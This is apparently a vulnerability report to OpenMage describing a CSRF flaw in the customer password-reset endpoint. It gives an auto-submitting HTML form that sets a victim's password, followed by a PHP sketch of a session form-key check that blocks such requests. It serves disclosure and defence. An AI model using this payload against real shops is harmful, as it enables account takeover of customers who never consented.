Hey OpenMage, the forgot password page is not protected against CSRF attacks, which can lead to the password being changed. Use the form below to test:
<html>
<body>
<form action="https://demo.openmage.org/customer/account/resetpasswordpost/" method="POST">
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="confirmation" value="password123" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
https://demo.openmage.org/customer/account/forgotpassword/
Password reset via CSRF
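A sketch of the missing check, added here as an illustration and not taken from the report or from OpenMage's code: the reset handler refuses any POST that does not carry a form key matching the one stored in the visitor's session. The function names, the `form_key` field name and the `$session` array are assumptions made for this example.

```php
<?php
// Added example, not OpenMage code. Function and field names are hypothetical.

/** Return the per-session form key, creating it on first use. */
function getFormKey(array &$session): string
{
    if (empty($session['form_key'])) {
        $session['form_key'] = bin2hex(random_bytes(16));
    }
    return $session['form_key'];
}

/** True only if the POST carries the key stored in this visitor's session. */
function isValidFormKey(array $session, array $post): bool
{
    $expected  = $session['form_key'] ?? '';
    $submitted = $post['form_key'] ?? '';
    // hash_equals() compares in constant time; reject empty or non-string input first.
    return is_string($submitted) && $expected !== ''
        && hash_equals($expected, $submitted);
}

/** Hypothetical reset handler: refuse to touch the password without a valid key. */
function handleResetPasswordPost(array &$session, array $post): string
{
    if (!isValidFormKey($session, $post)) {
        return 'rejected: missing or invalid form key';
    }
    if (($post['password'] ?? '') === '' || $post['password'] !== ($post['confirmation'] ?? null)) {
        return 'rejected: password and confirmation do not match';
    }
    // A real handler would update the stored password hash at this point.
    return 'accepted';
}

// Constructed demo: $session stands in for the visitor's server-side session.
$session = [];
$formKey = getFormKey($session); // rendered as a hidden field in the genuine form

// Fields as sent by the form in the report: no form key present.
$crossSite = ['password' => 'password123', 'confirmation' => 'password123'];
// Submission from the genuine page, which includes the hidden field.
$sameSite  = $crossSite + ['form_key' => $formKey];

echo handleResetPasswordPost($session, $crossSite), PHP_EOL;
echo handleResetPasswordPost($session, $sameSite), PHP_EOL;
```

Because a page on another origin cannot read the session's key, an auto-submitted form like the one in the report fails the first check before the password fields are ever looked at.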